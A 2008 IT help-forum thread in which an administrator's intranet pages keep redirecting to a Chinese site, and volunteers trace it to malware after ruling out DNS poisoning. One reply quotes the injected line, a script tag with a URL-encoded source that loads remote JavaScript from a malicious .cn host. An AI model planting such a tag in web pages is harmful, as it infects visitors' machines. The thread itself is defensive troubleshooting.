Solved

Web pages are being redirected

Posted on 2008-10-27
27
800 Views
Last Modified: 2013-12-14
Hi All,
It seems that our web pages are being redirected toe http://www.365http.cn/tt/logo.htm every time the users try to access a n intranet site.
Kronos1.doc
0
Comment
Question by:afsaleh
  • 11
  • 11
  • 4
  • +1
27 Comments
 
LVL 3

Assisted Solution

by:mrwalker15
mrwalker15 earned 200 total points
ID: 22814423
Your DNS cache has been poisoned. Clear the DNS cache from all your DNS servers.
0
 
LVL 5

Expert Comment

by:AncientFrib
ID: 22814453
Ensure there aren't any bad entries for the intranet DNS record on your DNS server.  Run from the command prompt: IPconfig /flushdns on your DNS servers and clients.  Good luck.
0
 

Author Comment

by:afsaleh
ID: 22814722
How can I clear the dns cache on dns servers
0
 

Author Comment

by:afsaleh
ID: 22814791
Tried running ipconfig /flushdns on both clients and dns servers, but did not work
0
 
LVL 12

Assisted Solution

by:hfraser
hfraser earned 200 total points
ID: 22814805
Make sure you flush the caches on both your internal DNS server, and your firewall's DNS server. Either or both could be poisoned.

If you have the opportunity, you can dump the DNS server's caches before flushing them to check for poisoning. Also, current releases of DNS servers should be resistant to DNS poisoning, so make sure your DNS server is an up-to-date release. If it got poisoned once, it can happen again unless you change something to prevent it.
0
 
LVL 3

Expert Comment

by:mrwalker15
ID: 22814845
Are you using Microsoft DNS Servers? If so, go to DNS mmc console.

Add or select (highlight it) the server. Right-click and select Clear DNS cache.
0
 
LVL 3

Expert Comment

by:mrwalker15
ID: 22814862
To help prevent cache poisoning. Under DNS mmc console.

Select the server

Right-click Properties > Advanced tab

Make sure "Secure cache against pollution" option is set.

Also, if you have a proxy server you may need to clear the cache there too.
0
 

Author Comment

by:afsaleh
ID: 22815187
tried cleaning cache on the dns server, but problem remains
0
 
LVL 3

Expert Comment

by:mrwalker15
ID: 22815222
Can you post the source code of the webpage in the picture?
0
 
LVL 12

Expert Comment

by:hfraser
ID: 22815235
Let's verify DNS is actually the issue. From a command shell, do an nslookup for one of your intranet sites that users are having trouble with. What is the response?
0
 

Author Comment

by:afsaleh
ID: 22816039
When doing nslookup on a local intranet site, the result is the name of the dns servcer.com and its ip address.
0
 
LVL 12

Expert Comment

by:hfraser
ID: 22816939
You should see something like

Server:            192.168.1.1
Address:      192.168.1.1#53

Name:      www.domain.com
Address: 192.168.1.2

If you resolve an address on the Internet against your DNS server, you should see something like:

nslookup www.google.com
Server:            192.168.1.1
Address:      192.168.1.1#53

Non-authoritative answer:
www.google.com      canonical name = www.l.google.com.
Name:      www.l.google.com
Address: 72.14.205.99
Name:      www.l.google.com
Address: 72.14.205.104
Name:      www.l.google.com
Address: 72.14.205.147
Name:      www.l.google.com
Address: 72.14.205.103

The difference is that you're not the authoritative source for www.google.com

Is this not similar to what you see?
0
 
LVL 3

Assisted Solution

by:mrwalker15
mrwalker15 earned 200 total points
ID: 22817315
Can you post the source code of the webpage.
0
How your wiki can always stay up-to-date

Quip doubles as a “living” wiki and a project management tool that evolves with your organization. As you finish projects in Quip, the work remains, easily accessible to all team members, new and old.
- Increase transparency
- Onboard new hires faster
- Access from mobile/offline

 

Author Comment

by:afsaleh
ID: 22820379
When doing the nslookup , I do see the same info as you have displayed  with the exception of the port #.
The first line will refer to the domain controller /dns controller  /wins server, while the second line refer to the actual application server.

Also please find attached the source code for the webpage.

Thanks
portal.txt
0
 
LVL 3

Expert Comment

by:mrwalker15
ID: 22821378
Your webpage was hacked.

Please remove the top line.
<script language=javascript src=http://%77%2E%63%38%38%6A%2E%63%6E/lg.js></script>

That points to w.c88j.cn/lg.js
0
 

Author Comment

by:afsaleh
ID: 22821459
I did remove this line fron the script , under view source. It keeps coming back
0
 
LVL 3

Expert Comment

by:mrwalker15
ID: 22821603
You need to scan your web server for malware. it must have a process rewriting the line to the web page everytime you update it.
make sure you have all the latest patches available installed as well.
0
 

Author Comment

by:afsaleh
ID: 22821670
What is the best scaner for this job. tried few , but none of them seems to work
0
 
LVL 3

Expert Comment

by:mrwalker15
ID: 22821717
What is your web server?
0
 

Author Comment

by:afsaleh
ID: 22821750
windows 2000 sp4
0
 
LVL 3

Expert Comment

by:mrwalker15
ID: 22821773
I would recommend Karspersky AV, spybot search and destroy. Secunia software advisor.

Patch everything UP straight away. if possible, turn off external access as this server is infected.

And run away from Windows 2000. It is a security hole!
0
 

Author Comment

by:afsaleh
ID: 22823609
ran spybot on th eserver and on the clients. Did not find any thing. The application will run fine on the server, but gets hijacked on the clients.
0
 
LVL 3

Expert Comment

by:mrwalker15
ID: 22823882
Ok, it seems that this is a code injection via ARP spoofing.

Can you see in the IIS logs if users are actually connecting to IIS to browse the webpage?
0
 
LVL 12

Assisted Solution

by:hfraser
hfraser earned 200 total points
ID: 22828877
This is a virus wit a payload that downloads a bunch of other code. I'f you've viewed this page from a browser on your web server, it's infect as well as the clients that view the page.

Shut down the web server before anything else gets infected. This isn't spyware. It's a virus/trojan. As mrwalker15 mentioned, run an anti-virus on the server and the clients. It's recognized by all the major ones. Check out:

http://virscan.org/report/00406cc94d36b929bb659b0241e2219b.html

to make sure your AV is up-to-date for this virus.
0
 

Author Comment

by:afsaleh
ID: 22850544
That works, thanks
0
 
LVL 3

Expert Comment

by:mrwalker15
ID: 22850993
Hi afsaleh,

What did actually work?
0
 

Accepted Solution

by:
afsaleh earned 0 total points
ID: 22851584
Ran sybot on both server and clients in safe mode. Also patched the server and clients with latest security patches.
After the rebooting to normal mode, flushed the dns buffer on both server and cloient, and re-installed the ie browser.
0

Featured Post

IT, Stop Being Called Into Every Meeting

Highfive is so simple that setting up every meeting room takes just minutes and every employee will be able to start or join a call from any room with ease. Never be called into a meeting just to get it started again. This is how video conferencing should work!

Join & Write a Comment

Suggested Solutions

It is possible to boost certain documents at query time in Solr. Query time boosting can be a powerful resource for finding the most relevant and "best" content. Of course the more information you index, the more fields you will be able to use for y…
If you don't have the right permissions set for your WordPress location in IIS, you won't be able to perform automatic updates. Here's how to fix the problem.
Get a first impression of how PRTG looks and learn how it works.   This video is a short introduction to PRTG, as an initial overview or as a quick start for new PRTG users.
Here's a very brief overview of the methods PRTG Network Monitor (https://www.paessler.com/prtg) offers for monitoring bandwidth, to help you decide which methods you´d like to investigate in more detail.  The methods are covered in more detail in o…

747 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

10 Experts available now in Live!

Get 1:1 Help Now